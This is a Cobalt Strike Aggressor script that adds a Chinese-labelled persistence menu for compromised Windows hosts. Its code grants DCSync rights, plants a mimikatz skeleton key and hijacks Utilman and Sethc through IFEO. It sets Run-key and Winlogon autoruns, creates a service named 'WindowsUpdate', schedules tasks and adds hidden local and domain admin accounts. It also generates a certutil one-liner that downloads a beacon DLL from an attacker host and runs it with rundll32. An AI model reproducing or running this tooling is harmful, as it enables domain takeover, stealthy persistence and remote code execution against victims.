menu "权限维持" {
	menu "DCSync" {
		item "DCSync_add_ACE" {
			$dialog = dialog("DCSync", %( bid => $1["@"] , user => "test" , Domain_prefix => "hack" , Domain_suffix => "com") , &DCSync_ADD_ACE);
			dialog_description($dialog,"通过DCSync向某一用户添加ACE来改变ACL,以此达到权限维持");
			drow_text($dialog,"user","User:");
			drow_text($dialog,"Domain_prefix","Domain_prefix");
			drow_text($dialog,"Domain_suffix","Domain_suffix");
			dbutton_action($dialog,"Exploit");
			dialog_show($dialog);
		}
	}
	separator();
	item "skeleton-Key" {
		bmimikatz($1["@"],"misc::skeleton");
	}
	separator();
	item "IFEO" {
		if( !-isadmin $1["@"])
		{
			show_error("Permission Denied!");
		}
		else
		{
			$dialog = dialog("镜像劫持",%( bid => $1["@"] , Type => "Utilman" , CallBackFile => "c:\\Windows\\system32\\cmd.exe" ),&IFEO_INSTALL);
			dialog_description($dialog,"通过镜像劫持进行权限维持");
			drow_combobox($dialog,"Type","Type:",@("Utilman.exe", "Sethc.exe"));
			drow_text($dialog,"CallBackFile","CallBackFile:")
			dbutton_action($dialog,"Exploit");
			dialog_show($dialog);
		}
	}
	separator();
	item "计划任务" {
		$dialog = dialog("Schtasks",%(bid => $1["@"], name => "Mikasa" , backfile => "C:\\Windows\\system32\\cmd.exe" , time => "minute" , modifier => "1"),&schtasks_add);
		dialog_description($dialog,"通过schatasks定时执行计划任务");
		drow_text($dialog,"name","任务名称:");
		drow_text($dialog,"backfile","执行的命令或文件:");
		drow_combobox($dialog,"time","执行时间:",@("minute","hourly","daily","weekly","monthly"));
		drow_text($dialog,"modifier","执行周期:");
		dbutton_action($dialog,"Exploit!");
		dialog_show($dialog);
	}
	separator();
	item "AutoRun" {
                        $bid = $1['@'];
                        $Dialog = dialog("Auto Run",%(RegKey => "HKLM", RegItem => "Run", CallBackFile => "C:\\Windows\\system32\\cmd.exe",bid => $bid),&InstallAutoRun);
                        dialog_description($Dialog, "Registry Add Boot Start Item");
                        drow_combobox($Dialog, "RegKey", "Key: ", @("HKLM", "HKCU"));
                        drow_combobox($Dialog, "RegItem", "RegItem: ", @("Run", "RunOnce", "RunOnceEx", "Winlogon", "Logon Scripts"));
                        drow_text($Dialog, "CallBackFile", "CallBackFile: ");
                        dbutton_action($Dialog, "Reg");
                        dialog_show($Dialog);
					}
	separator();	
	item "SC创建服务"{
			             $bid = $1['@'];
			             $Dialog = dialog("Registration service",%(SerName => "WindowsUpdate", Path => "C:\\Windows\\system32\\cmd.exe",bid => $bid),&InstallService);
			             dialog_description($Dialog, "Register an executable file as a service");
			             drow_text($Dialog, "SerName", "Service Name: ");
			             drow_text($Dialog, "Path", "Bin Path: ");
			             dbutton_action($Dialog, "Install");
			             dialog_show($Dialog);
			        }

			        separator();
			 menu "UserCollect" {
			 item "单机环境添加用户" {

				bupload($1["@"],script_resource("./modules/Persistence/Useradd.exe"));
				bshell($1["@"],"attrib Useradd.exe +s +h");
				binput($1["@"],"shell Useradd.exe");
				bshell($1["@"],"Useradd.exe");
				bshell($1["@"],"attrib Useradd.exe -s -h");
				bshell($1["@"],"del Useradd.exe");
				blog($1["@"],"User:Saber pass:password@123");
			}
			menu "单机环境添加用户(MyCsharp)" {

			sub CsharpAddUser{
    		$Name = $3['Username'];
    		$Pass = $3['PassWord'];
    		$args = "-a " . $Name . " " . $Pass;
    		bexecute_assembly($3['bid'],script_resource("./modules/Persistence/NetUserAdd.exe"),$args);
			}
			 item "AddUser"{
			 			 $bid = $1['@'];
			             $Dialog = dialog("AddUser",%(Username => "Saber", PassWord => "PassWord",bid => $bid),&CsharpAddUser);
			             dialog_description($Dialog, "AddUser By CSharp");
			             drow_text($Dialog, "Username", "UserName: ");
			             drow_text($Dialog, "PassWord", "PassWord: ");
			             dbutton_action($Dialog, "Exploit!");
			             dialog_show($Dialog);
			 		}
			 sub CsharpDelUser{
    		$Name = $3['Username'];
    		$args = "-d " . $Name;
    		bexecute_assembly($3['bid'],script_resource("./modules/Persistence/NetUserAdd.exe"),$args);
			}
			 
			 item "DelUser"{

			 			 $bid = $1['@'];
			             $Dialog = dialog("AddUser",%(Username => "Saber",bid => $bid),&CsharpDelUser);
			             dialog_description($Dialog, "AddUser By CSharp");
			             drow_text($Dialog, "Username", "UserName: ");
			             dbutton_action($Dialog, "Exploit!");
			             dialog_show($Dialog);

			 }

			}

		item "激活guest用户" {
		
		if(-isadmin $1["@"])
			{
    		$bid = $1['@'];
    		bshell($bid, "net user guest /active:yes");
			}
			else
			{
				show_error("Permission Denied!");
			}

  }


  item "创建管理员用户" {
    $bid = $1['@'];
    $Dialog = dialog("添加本地管理员用户",%(username => "zjun$", passwd => "admin@123.", "groups" => "administrators", bid => $bid),&add_localuser);
    dialog_description($Dialog, "添加本地管理员用户，注意账户策略中的密码复杂度。");
    drow_text($Dialog, "username", "username: ");
    drow_text($Dialog, "passwd", "passwd: ");
    drow_text($Dialog, "groups", "groups: ");
    dbutton_action($Dialog, "运行");
    dialog_show($Dialog);
  }
  sub add_localuser{
    local('$Name');
    $Name = $3['username'];
    $Pwd = $3['passwd'];
    $groups = $3['groups'];
    bshell($bid, "net user $Name $Pwd /add && net localgroup $groups $Name /add");
  }


  item "添加域管用户"{
    $bid = $1['@'];
    $Dialog = dialog("添加域管",%(username => "zjun$",passswd => "admin@123.",bid => $bid),&add_domainuser);
    dialog_description($Dialog, "添加域管理员用户，注意账户策略中的密码复杂度。");
    drow_text($Dialog, "username", "username: ");
    drow_text($Dialog, "passswd", "passswd: ");
    dbutton_action($Dialog, "运行");
    dialog_show($Dialog);
  }
  sub add_domainuser{
    local('$Name');
    $Name = $3['username'];
    $Pwd = $3['passswd'];
    bshell($bid, "net user $Name $Pwd /add /domain && net group \"Domain Admins\" $Name /add /domain");
  }


  menu "add-admin(bypass)"{
    item "上传add-admin"{
      local('$bid');
      foreach $bid ($1){
        bupload($1, script_resource("/modules/Persistence/add-admin.exe"));
        blog($1, "项目地址：https://github.com/lengjibo/RedTeamTools/blob/master/windows/bypass360%E5%8A%A0%E7%94%A8%E6%88%B7/README.md")
      }
    }
    item "运行add-admin" {
      $bid = $1['@'];
      $dialog = dialog("add-admin", %(bid => $bid), &add_admin);
      dialog_description($dialog, "执行后自动添加一个账户进入管理员组，并自动删除程序。帐号：hacker 密码：P@ssw0rd，添加完成后及时修改账号名，过于招摇。");
      dbutton_action($dialog, "运行");
      dialog_show($dialog);
    }
    sub add_admin{
      bshell($bid, "add-admin.exe");
      bshell($bid, "del /f /s /q add-admin.exe");
    }
  }
	}

	item "自启目录" {

			show_message("跟修改注册表一个道理,只是执行的方式不同而已");
			binput($1["@"],"C:\\Users\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WindowsUpdate.exe");
			blog($1["@"],"自启目录位于： C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\,建议copy过后使用attrib隐藏文件属性")
	}

 menu "\"遥测\"计划任务" {
					item "无文件执行命令" {
			$bid = $1['@'];
			$dialog = dialog("Telemetry", %(command => "",bid => $bid), &Telemetry_cmd);
			dialog_description($dialog, "输入cmd命令，cmd /s 后面的内容，执行方式：Telemetry.exe install /command:calc");
			drow_text($dialog, "command", "command:  ");	
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub Telemetry_cmd {
		$arg = join('', @("install /command:",$3['command']));
		bexecute_assembly($bid, script_resource("/modules/Persistence/Telemetry.exe"), $arg);
}

				item "远程下载文件自启" {
			$bid = $1['@'];
			$dialog = dialog("Telemetry", %(url => "",bid => $bid), &Telemetry_url);
			dialog_description($dialog, "输入exe下载地址，执行方式：Telemetry.exe install /url:http://vps:8089/System.exe");
			drow_text($dialog, "url", "url:  ");	
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub Telemetry_url {
		$arg = join('', @("install /url:",$3['url']));
		bexecute_assembly($bid, script_resource("/modules/Persistence/Telemetry.exe"), $arg);
}


}

item "CertUtil Web Delivery" {
		local('$dialog %defaults');

		%defaults["uri"]  = "/test.dll";
		%defaults["host"] = localip();
		%defaults["port"] = 80;

		$dialog = dialog("CertUtil Web Delivery (Stageless)", %defaults, &stage_attack);
		dialog_description($dialog, "生成payload使用ccertutil远程下载，然后使用rundll32.exe执行");
		drow_text($dialog, "uri", "URI Path: ", 20);
		drow_text($dialog, "host", "Local Host: ");
		drow_text($dialog, "port", "Local Port: ");
		drow_listener_stage($dialog, "listener", "Listener: ");
		drow_checkbox($dialog, "x64", "x64: ", "Use x64 payload");
		dbutton_action($dialog, "Launch");

		dialog_show($dialog);
	}
sub stage_attack {
	local('%options $script $url $arch');
	%options = $3;

	$arch = iff(%options["x64"] eq "true", "x64", "x86");

	artifact_stageless(%options["listener"], "dll", $arch, $null, $this);
	yield;

	$script = $1;

	$url = site_host(%options["host"], %options["port"], %options["uri"], $script, "automatic", "Scripted Web Delivery (CertUtil)"); 

	prompt_text("Copy/Paste One-liner: ", "powerpick certutil.exe -urlcache -split -f " . $url . " Adobedll.dll; rundll32.exe Adobedll.dll,StartW", {});
	show_message("Be aware of the default values in this script and change them! (Adobedll.dll, dll.txt)");
	elog("powerpick certutil.exe -urlcache -split -f " . $url . " Adobedll.dll; rundll32.exe Adobedll.dll,StartW");

}
				item "SharpSQLTools" {
			$bid = $1['@'];
			$dialog = dialog("SharpSQLTools", %(host => "",username => "",password => "",type => "xp",cmd => "whoami",enable => "None",bid => $bid), &SharpSQLTools);
			dialog_description($dialog, "命令行版SQLTools");
			drow_text($dialog, "host", "host:  ");	
			drow_text($dialog, "username", "username:  ");	
			drow_text($dialog, "password", "password:  ");			
			drow_combobox($dialog, "type", "-xp/-sp", @("-xp", "-sp"));
			drow_combobox($dialog, "enable", "enable", @("None", "enable"));
			drow_text($dialog, "cmd", "cmd:  ");
            dbutton_action($dialog, "运行");
			dialog_show($dialog);
        }
sub SharpSQLTools {
	if($3['enable'] =~ "enable"){
		$arg = join(' ', @("-h",$3['host'],"-u",$3['username'],"-p",$3['password'],$3['type'],$3['enable']));
		bexecute_assembly($bid, script_resource("/modules/Persistence/SharpSQLTools.exe"), $arg);
		}
	else
	{
		$arg = join(' ', @("-h",$3['host'],"-u",$3['username'],"-p",$3['password'],$3['type'],"-c","$3['cmd']"));
		bexecute_assembly($bid, script_resource("/modules/Persistence/SharpSQLTools.exe"), $arg);
		}
}		
		


}

sub DCSync_ADD_ACE {
	bpowershell_import($3['bid'],script_resource("./modules/Persistence/PowerView.ps1"));
	$payload = "Add-DomainObjectAcl -TargetIdentity \"DC=" . $3['Domain_prefix'] . ",DC=" . $3['Domain_suffix'] . "\" -PrincipalIdentity " .$3['user'] . " -Rights DCSync -Verbose";
	bpowershell($3['bid'],$payload);
}

sub IFEO_INSTALL {
	$payload = "\"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\" . $3["Type"] . "\"";
	show_message($payload);
	bshell($3["bid"],"reg add " . $payload . " /f");
	bshell($3["bid"],"reg add " . $payload . " /v Debugger /t REG_SZ /d " . $3["CallBackFile"] . " /f");
}


sub InstallAutoRun{
    local('$Prefix $File $Key $Item $Reg');
    $Prefix = "\\Software\\Microsoft\\Windows\\CurrentVersion\\";
    $File = replace($3['CallBackFile'], "\"", "");
    $Key = "\"".$3['RegKey'];
    $Item = $3['RegItem']."\"";
    if($3['RegItem'] eq "Winlogon"){
        $Prefix = replace($Prefix,'Windows',"Windows NT");
        $Reg = $Key.$Prefix.$Item;
        bshell($bid,"reg add  $+ $Reg /v Userinit /t REG_SZ /d \" C:\\Windows\\system32\\userinit.exe, $+ $File \" /f ");
    }
    else if($3['RegItem'] eq "Logon Scripts"){
        bshell($bid,"reg add  \"HKCU\\Environment\" /v UserInitMprLogonScript /t REG_SZ /d \" $+ $File \" /f ");
    }
    else{
        $Reg = $Key.$Prefix.$Item;
        bshell($bid,"reg add  $+ $Reg /f");
        bshell($bid,"reg add  $+ $Reg /v Svchost /t REG_SZ /d \" $+ $File \" /f ");
    }
}



sub InstallService{
    local('$Name $Path');
    $Name = $3['SerName'];
    $Path = replace($3['Path'], "\"", "");
    bshell($bid, "sc create \" $+ $Name\" binpath= \"cmd /c start \" $+ $Path\"\"&&sc config \" $+ $Name\" start= auto&&net start   $+ $Name");
}

sub schtasks_add {
	$payload = "schtasks /create /tn " . $3["name"]  . " /tr \"" . $3["backfile"] . "\"" . " /sc " . $3["time"] . " /mo " . $3["modifier"];
	binput($3["bid"],"shell " . $payload);
	bshell($3["bid"],$payload);
}